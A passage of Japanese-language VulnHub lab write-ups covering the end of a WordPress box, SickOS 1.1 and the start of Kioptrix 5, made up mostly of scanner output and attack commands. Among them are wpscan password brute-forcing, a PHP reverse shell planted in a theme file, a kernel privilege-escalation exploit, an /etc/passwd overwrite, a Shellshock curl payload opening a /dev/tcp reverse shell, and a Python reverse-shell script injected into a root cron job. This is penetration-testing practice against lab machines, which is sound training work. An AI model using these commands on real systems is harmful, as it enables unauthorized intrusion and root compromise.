OSVDB-3092: /secret/: This might be interesting... + OSVDB-3233: /icons/README: Apache default file found. + 7837 requests: 0 error(s) and 9 item(s) reported on remote host + End Time: 2020-05-04 03:11:26 (GMT-4) (73 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # dirb http://10.10.10.10 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon May 4 03:11:39 2020 URL_BASE: http://10.10.10.10/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.10/ ---- + http://10.10.10.10/index.html (CODE:200|SIZE:177) ==> DIRECTORY: http://10.10.10.10/secret/ + http://10.10.10.10/server-status (CODE:403|SIZE:299) ---- Entering directory: http://10.10.10.10/secret/ ---- + http://10.10.10.10/secret/index.php (CODE:301|SIZE:0) ==> DIRECTORY: http://10.10.10.10/secret/wp-admin/ ==> DIRECTORY: http://10.10.10.10/secret/wp-content/ ==> DIRECTORY: http://10.10.10.10/secret/wp-includes/ + http://10.10.10.10/secret/xmlrpc.php (CODE:405|SIZE:42) ---- Entering directory: http://10.10.10.10/secret/wp-admin/ ---- + http://10.10.10.10/secret/wp-admin/admin.php (CODE:302|SIZE:0) ==> DIRECTORY: http://10.10.10.10/secret/wp-admin/css/ ==> DIRECTORY: http://10.10.10.10/secret/wp-admin/images/ ==> DIRECTORY: http://10.10.10.10/secret/wp-admin/includes/ + http://10.10.10.10/secret/wp-admin/index.php (CODE:302|SIZE:0) ==> DIRECTORY: http://10.10.10.10/secret/wp-admin/js/ ==> DIRECTORY: http://10.10.10.10/secret/wp-admin/maint/ ==> DIRECTORY: http://10.10.10.10/secret/wp-admin/network/ ==> DIRECTORY: http://10.10.10.10/secret/wp-admin/user/ ---- Entering directory: http://10.10.10.10/secret/wp-content/ ---- + http://10.10.10.10/secret/wp-content/index.php (CODE:200|SIZE:0) ==> DIRECTORY: http://10.10.10.10/secret/wp-content/plugins/ ==> DIRECTORY: http://10.10.10.10/secret/wp-content/themes/ ---- Entering directory: http://10.10.10.10/secret/wp-includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.10/secret/wp-admin/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.10/secret/wp-admin/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.10/secret/wp-admin/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.10/secret/wp-admin/js/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.10/secret/wp-admin/maint/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.10/secret/wp-admin/network/ ---- + http://10.10.10.10/secret/wp-admin/network/admin.php (CODE:302|SIZE:0) + http://10.10.10.10/secret/wp-admin/network/index.php (CODE:302|SIZE:0) ---- Entering directory: http://10.10.10.10/secret/wp-admin/user/ ---- + http://10.10.10.10/secret/wp-admin/user/admin.php (CODE:302|SIZE:0) + http://10.10.10.10/secret/wp-admin/user/index.php (CODE:302|SIZE:0) ---- Entering directory: http://10.10.10.10/secret/wp-content/plugins/ ---- + http://10.10.10.10/secret/wp-content/plugins/index.php (CODE:200|SIZE:0) ---- Entering directory: http://10.10.10.10/secret/wp-content/themes/ ---- + http://10.10.10.10/secret/wp-content/themes/index.php (CODE:200|SIZE:0) ----------------- END_TIME: Mon May 4 03:12:26 2020 DOWNLOADED: 36896 - FOUND: 13
突然のwordpress登場。
何か可笑しい?
「http://vtcsec/secret/index.php/wp-json/」が気になる。
「http://10.10.10.10/secret」に接続すると、何か表示変な気がするし、多くのリンクが「vtcsec」ドメインになっている。
つまり、hostファイルに「vtcsec」を登録する必要がある?
# echo "10.10.10.10 vtcsec" >> /etc/hosts # curl http://vtcsec <html><body><h1>It works!</h1> <p>This is the default web page for this server.</p> <p>The web server software is running but no content has been added, yet.</p> </body></html>
先ほど上手く繋がらなかったリンクにも飛べるようになった。
# wpscan --url http://vtcsec/secret -e ap,at,u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.1 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://vtcsec/secret/ [10.10.10.10] [+] Started: Mon May 4 07:23:46 2020 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.18 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://vtcsec/secret/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://vtcsec/secret/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://vtcsec/secret/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.9 identified (Insecure, released on 2017-11-16). | Found By: Rss Generator (Passive Detection) | - http://vtcsec/secret/index.php/feed/, <generator>https://wordpress.org/?v=4.9</generator> | - http://vtcsec/secret/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.9</generator> [+] WordPress theme in use: twentyseventeen | Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/ | Last Updated: 2020-03-31T00:00:00.000Z | Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 2.3 | Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css?ver=4.9 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.4 (80% confidence) | Found By: Style (Passive Detection) | - http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css?ver=4.9, Match: 'Version: 1.4' [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating All Themes (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:00:49 <==========================================================================================================================================================> (20900 / 20900) 100.00% Time: 00:00:49 [+] Checking Theme Versions (via Passive and Aggressive Methods) [i] Theme(s) Identified: [+] twentyfifteen | Location: http://vtcsec/secret/wp-content/themes/twentyfifteen/ | Last Updated: 2020-03-31T00:00:00.000Z | Readme: http://vtcsec/secret/wp-content/themes/twentyfifteen/readme.txt | [!] The version is out of date, the latest version is 2.6 | Style URL: http://vtcsec/secret/wp-content/themes/twentyfifteen/style.css | Style Name: Twenty Fifteen | Style URI: https://wordpress.org/themes/twentyfifteen/ | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Known Locations (Aggressive Detection) | - http://vtcsec/secret/wp-content/themes/twentyfifteen/, status: 500 | | Version: 1.9 (80% confidence) | Found By: Style (Passive Detection) | - http://vtcsec/secret/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.9' [+] twentyseventeen | Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/ | Last Updated: 2020-03-31T00:00:00.000Z | Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 2.3 | Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Urls In Homepage (Passive Detection) | Confirmed By: Known Locations (Aggressive Detection) | - http://vtcsec/secret/wp-content/themes/twentyseventeen/, status: 500 | | Version: 1.4 (80% confidence) | Found By: Style (Passive Detection) | - http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.4' [+] twentysixteen | Location: http://vtcsec/secret/wp-content/themes/twentysixteen/ | Last Updated: 2020-03-31T00:00:00.000Z | Readme: http://vtcsec/secret/wp-content/themes/twentysixteen/readme.txt | [!] The version is out of date, the latest version is 2.1 | Style URL: http://vtcsec/secret/wp-content/themes/twentysixteen/style.css | Style Name: Twenty Sixteen | Style URI: https://wordpress.org/themes/twentysixteen/ | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Known Locations (Aggressive Detection) | - http://vtcsec/secret/wp-content/themes/twentysixteen/, status: 500 | | Version: 1.4 (80% confidence) | Found By: Style (Passive Detection) | - http://vtcsec/secret/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.4' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] admin | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Wp Json Api (Aggressive Detection) | - http://vtcsec/secret/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Mon May 4 07:24:53 2020 [+] Requests Done: 20932 [+] Cached Requests: 47 [+] Data Sent: 4.849 MB [+] Data Received: 3.127 MB [+] Memory used: 264.789 MB [+] Elapsed time: 00:01:06
とりあえずadminのパスワードを探す。
(snip) [+] Performing password attack on Wp Login against 1 user/s Trying admin / loulou Time: 00:00:22 <> (1331 / 14344391) 0.00% ETA: 67:32:Trying admin / candy1 Time: 00:00:22 <> (1333 / 14344391) 0.00% ETA: 67:28: Trying admin / tequieromucho Time: 00:00:23 <> (1400 / 14344391) 0.00% ETA: 67:53Trying admin / liverpoolfc Time: 00:00:30 <> (1784 / 14344391) 0.01% ETA: 67:56:1Trying admin / babykohTrying admin / admin Time: 00:05:59 <=========================================> (19820 / 19820) 100.00% Time: 00:05:59 [SUCCESS] - admin / admin [!] Valid Combinations Found: | Username: admin, Password: admin (snip)
adminはデフォルトで使われてたんか。
ということでadmin/adminでログイン。
単純なファイルアップロードのやり方が分からなかったので、既存ファイルの書き換えでいく。
自分の場合は「Appearance」の「Editor」を選択して、Thema Filesのうちserach.phpを選択。
最後の方に
kali linuxの/usr/share/webshells/php/php-reverse-shell.php
を自分用に書き換えたやつを追加。
これでwordpressページで「serach」ボタンを押すとreverse-shellするようになった。
「404.php」を書き換えても良かったが、アクセスするパスが分からなった。
待ちながら押したら来る # nc -nlvp 8080 (push [search]) Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 09:07:25 up 7:28, 0 users, load average: 0.00, 0.00, 0.03 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
after shell getchu
victim $ uname -a Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
attacker # searchsploit linux ubuntu 16.04 ----------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------- ---------------------------------------- (snip) Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalatio | exploits/linux/local/45010.c (snip) # cp /usr/share/exploitdb/exploits/linux/local/45010.c 45010.c # python -m SimpleHTTPServer 80
victim $ cd /tmp $ wget 10.10.10.3/45010.c --2020-05-04 09:01:46-- http://10.10.10.3/45010.c Connecting to 10.10.10.3:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13728 (13K) [text/plain] Saving to: '45010.c' 0K .......... ... 100% 14.6M=0.001s 2020-05-04 09:01:46 (14.6 MB/s) - '45010.c' saved [13728/13728] $ gcc 45010.c $ ./a.out id uid=0(root) gid=0(root) groups=0(root),33(www-data)
Kernel exploitは複数ありそうだけど、一番絶対ハマりそうなやつを選択した。
privcheck
# cp /usr/bin/unix-privesc-check pric
権限チェックなんてやってくれるすごいプログラムがkali linuxにはあるらしくて使ってみた。
victimに送って動かす。
victim $ ./pric detailed | grep WARNING passwd: Permission denied. Search the output below for the word 'WARNING'. If you don't see it then WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd (snip)
何か色々止まらないので、一番上の面白そうなやつだけピックアップ
実は今回の環境「/etc/passwd」ファイルをrootでなくても書き換えられる。
$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ cp /etc/passwd /tmp/passwd $ openssl passwd -1 password $1$n.m2eSNO$znpjjJIvqy12UiYDL6G90/ $ echo "root:\$1\$7Y7rVxIM\$pZaXFk7OlTVsq3X2aMiAM.:0:0:root:/root:/bin/bash" > /etc/passwd $ cat /tmp/passwd >> /etc/passwd $ su - su: must be run from a terminal $ python -c "import pty;pty.spawn('/bin/bash')" www-data@vtcsec:/tmp$ su - su - Password: password root@vtcsec:~# id id uid=0(root) gid=0(root) groups=0(root)
終わり
- hydraよりwpscanの方がwordpress辞書攻撃早い?
- 404.phpは「http://vtcsec/secret/wp-content/themes/twentyseventeen/404.php」にあった。
vulnhub SickOS 1.1 雑記
SickOS 1.1
ovfから展開すると失敗した。 新規から既存ハードディスク追加等ならいける。
サービス調査
# nmap -p- 10.10.10.9 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 23:25 EDT Nmap scan report for 10.10.10.9 Host is up (0.00074s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 22/tcp open ssh 3128/tcp open squid-http 8080/tcp closed http-proxy MAC Address: 08:00:27:3C:37:E6 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 118.00 seconds # nmap -p22,3128,8080 -sV -version-all 10.10.10.9 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 23:28 EDT Nmap scan report for 10.10.10.9 Host is up (0.00086s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) 3128/tcp open http-proxy Squid http proxy 3.1.19 8080/tcp closed http-proxy MAC Address: 08:00:27:3C:37:E6 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.47 seconds
気になりどころ
- [port 22 ssh] OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) どうせ何もない
- [port 3128 http-proxy] Squid http proxy 3.1.19 これがproxyだってこと忘れていて実は苦労した
詳細
[port 22 ssh] OpenSSH 5.9p1
特に何もない。分からない。
[port 3128 http-proxy] Squid http proxy 3.1.19
こいつ自体のexploitは無さそう?
SickOS1.1のwebサービスへのアクセスは全てport 3128のproxyを経由する必要がある。
# nikto -h 10.10.10.9 -useproxy 10.10.10.9:3128 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.9 + Target Hostname: 10.10.10.9 + Target Port: 80 + Proxy: 10.10.10.9:3128 + Start Time: 2020-05-02 11:33:08 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.22 (Ubuntu) + Retrieved via header: 1.0 localhost (squid/3.1.19) + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128 + Uncommon header 'x-cache' found, with contents: MISS from localhost + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec 4 19:35:02 2015 + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0 + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php + Uncommon header '93e4r0-cve-2014-6271' found, with contents: true + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + 8674 requests: 0 error(s) and 15 item(s) reported on remote host + End Time: 2020-05-02 11:33:58 (GMT-4) (50 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # dirb http://10.10.10.9 -p 10.10.10.9:3128 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat May 2 11:43:27 2020 URL_BASE: http://10.10.10.9/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt PROXY: 10.10.10.9:3128 ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.9/ ---- + http://10.10.10.9/cgi-bin/ (CODE:403|SIZE:286) + http://10.10.10.9/connect (CODE:200|SIZE:109) + http://10.10.10.9/index (CODE:200|SIZE:21) + http://10.10.10.9/index.php (CODE:200|SIZE:21) + http://10.10.10.9/robots (CODE:200|SIZE:45) + http://10.10.10.9/robots.txt (CODE:200|SIZE:45) + http://10.10.10.9/server-status (CODE:403|SIZE:291) ----------------- END_TIME: Sat May 2 11:43:36 2020 DOWNLOADED: 4612 - FOUND: 7
気になるところが沢山ある。
apacheとphp 5.3.10の組み合わせで良さそうなのを発見
# searchsploit apache php 5.3 ----------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------- ---------------------------------------- Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | exploits/php/remote/29316.py Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | exploits/php/remote/29290.c ----------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result
exploitコードそのままではプロキシされている場合汎用性がなかったよう?
cve-2014-6271,CVE-2014-6278に関して
shellshockというのがあるらしい。
# curl --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status { "uptime": " 21:41:52 up 1:10, 0 users, load average: 0.00, 0.01, 0.05", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"}
今回の場合「/cgi-bin/status」に問い合わせると何かコマンド入れたっぽいのが返ってくる。
ここにOSコマンドインジェクションできちゃうのがShellShock!
てか、dirbでは「/cgi-bin/status」引っかからないのな。
とりあえずbashの処理に問題があって、処理を誤魔化すことができるぽい。
# curl -H "U: () { :;}; echo ; echo ;/bin/bash -c id;" --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status uid=33(www-data) gid=33(www-data) groups=33(www-data)
今回の場合だと「/cgi-bin/status」にどんなヘッダで送っても、処理を誤魔化せるコードならOSコマンドインジェクションできるぽい。
window 1 # rlwrap nc -nlvp 443
window 2 # curl -H "U: () { :;}; echo ; echo ;/bin/bash -c bash -i >& /dev/tcp/10.10.10.3/443 0>&1;" --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status
window 1 id uid=33(www-data) gid=33(www-data) groups=33(www-data) python -c "import pty;pty.spawn('/bin/bash')" www-data@SickOs:/usr/lib/cgi-bin$
reverse-shell!
robots.txt
アクセスすると
User-agent: * Disallow: / Dissalow: /wolfcms
では「wolfcms」というやつを見る。
何かのホームページぽい。
「http://10.10.10.9/wolfcms/?/admin/login」ここにログインページ発見。
まさかのuser:admin,password:adminでログインできる。
ログイン先には何とご丁寧に「Upload file」のボタンが。
reverse.phpを置かせていただくしかない。
window 1 # rlwrap nc -nlvp 8080
window 2 # curl --proxy 10.10.10.9:3128 http://10.10.10.9/wolfcms/public/reverse.php
window 1 Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux 23:34:51 up 3:03, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data)
after reverse-shell
connect.py
さっきのdirbで実は気になっていた「connect.py」を調べる。
www-data@SickOs:/usr/lib/cgi-bin$ cd /var/www cd /var/www www-data@SickOs:/var/www$ ls ls connect.py index.php robots.txt wolfcms www-data@SickOs:/var/www$ cat connect.py cat connect.py #!/usr/bin/python print "I Try to connect things very frequently\n" print "You may want to try my services"
頻繁にconnect? ますます怪しい。
これは何のことだったのかcronを見ると分かった。
www-data@SickOs:/var/www$ ls -al /etc/cron.d ls -al /etc/cron.d total 20 drwxr-xr-x 2 root root 4096 Dec 5 2015 . drwxr-xr-x 90 root root 4096 May 3 20:31 .. -rw-r--r-- 1 root root 102 Jun 20 2012 .placeholder -rw-r--r-- 1 root root 52 Dec 5 2015 automate -rw-r--r-- 1 root root 544 Jul 2 2015 php5 www-data@SickOs:/var/www$ cat /etc/cron.d/automate cat /etc/cron.d/automate * * * * * root /usr/bin/python /var/www/connect.py
つまり、root権限で定期的に実行される「connect.py」を弄ってやればroot取れる。
attacker # cat getroot.py #! /usr/bin/env python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.3",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); root@kali:~/EXattack/Vulunhub/SickOS1-1# python -m SimpleHTTPServer 80
victim www-data@SickOs:/tmp$ cd /tmp cd /tmp www-data@SickOs:/tmp$ wget 10.10.10.3/getroot.py wget 10.10.10.3/getroot.py --2020-05-03 23:12:22-- http://10.10.10.3/getroot.py Connecting to 10.10.10.3:80... connected. HTTP request sent, awaiting response... 200 OK Length: 238 [text/plain] Saving to: `getroot.py' 100%[======================================>] 238 --.-K/s in 0s 2020-05-03 23:12:22 (17.2 MB/s) - `getroot.py' saved [238/238] www-data@SickOs:/tmp$ cp /tmp/getroot.py /var/www/connect.py cp /tmp/getroot.py /var/www/connect.py
attacker # nc -nlvp 8080
あとは「connect.py」の起動を待つのみ。
動けばroot取れる。
attacker # id uid=0(root) gid=0(root) groups=0(root)
おまけ
# cd /root # ls a0216ea4d51874464078c618298b1367.txt # cat a0216ea4d518^? cat: a0216ea4d518: No such file or directory # cat *.txt If you are viewing this!! ROOT! You have Succesfully completed SickOS1.1. Thanks for Trying
こういうのもあったのか
# dirb http://10.10.10.9/wolfcms -p 10.10.10.9:3128 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun May 3 13:49:54 2020 URL_BASE: http://10.10.10.9/wolfcms/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt PROXY: 10.10.10.9:3128 ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.9/wolfcms/ ---- + http://10.10.10.9/wolfcms/composer (CODE:200|SIZE:403) + http://10.10.10.9/wolfcms/config (CODE:200|SIZE:0) ==> DIRECTORY: http://10.10.10.9/wolfcms/docs/ + http://10.10.10.9/wolfcms/favicon.ico (CODE:200|SIZE:894) + http://10.10.10.9/wolfcms/index (CODE:200|SIZE:3975) + http://10.10.10.9/wolfcms/index.php (CODE:200|SIZE:3975) ==> DIRECTORY: http://10.10.10.9/wolfcms/public/ + http://10.10.10.9/wolfcms/robots (CODE:200|SIZE:0) + http://10.10.10.9/wolfcms/robots.txt (CODE:200|SIZE:0) ---- Entering directory: http://10.10.10.9/wolfcms/docs/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.9/wolfcms/public/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Sun May 3 13:50:01 2020 DOWNLOADED: 4612 - FOUND: 7 # dirb http://10.10.10.9/cgi-bin -p 10.10.10.9:3128 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun May 3 13:50:10 2020 URL_BASE: http://10.10.10.9/cgi-bin/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt PROXY: 10.10.10.9:3128 ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.9/cgi-bin/ ---- + http://10.10.10.9/cgi-bin/status (CODE:200|SIZE:197) ----------------- END_TIME: Sun May 3 13:50:17 2020 DOWNLOADED: 4612 - FOUND: 1
終
cronとhttp.confと.htaccessを注意深くみる。
vulnhub Kioptrix 5(1.4) 雑記
kioptrix 5(1-4)
何も考えずに、いつも通り仮想ディスクを作らないで後からIDEを追加しても起動しなかった。
元々配信されていたイメージ(.vmdk)に加えて、*fix.zipをダウンロードする。
*fix.zipに含まれている「*.vbox」からVMを作り、すでにセットされているストレージを消して改めて「*.vmdk」をIDEに追加する。
その後、*fix.zipに含まれていた画像にある通り、VMを起動した後の「mountroot>」プロンプトにてufs:/dev/ada0p2
と入力すると起動した。
pentest
サービス調査
# nmap -p- 10.10.10.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:13 EDT Nmap scan report for 10.10.10.8 Host is up (0.00067s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 22/tcp closed ssh 80/tcp open http 8080/tcp open http-proxy MAC Address: 08:00:27:73:6F:80 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 117.95 seconds # nmap -p22,80,8080 -sV -version-all 10.10.10.8 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:17 EDT Nmap scan report for 10.10.10.8 Host is up (0.00072s latency). PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) 8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) MAC Address: 08:00:27:73:6F:80 (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 27.64 seconds
nmap長いなぁ
気になりどころ
- port80 Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
- port8080 Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
詳細
80ポートのApacheからのアプローチ
# nikto -h 10.10.10.8 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.8 + Target Hostname: 10.10.10.8 + Target Port: 80 + Start Time: 2020-04-30 08:21:42 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 + Server may leak inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + PHP/5.3.8 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch. + OpenSSL/0.9.8q appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current. + mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version) + Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + 8672 requests: 0 error(s) and 11 item(s) reported on remote host + End Time: 2020-04-30 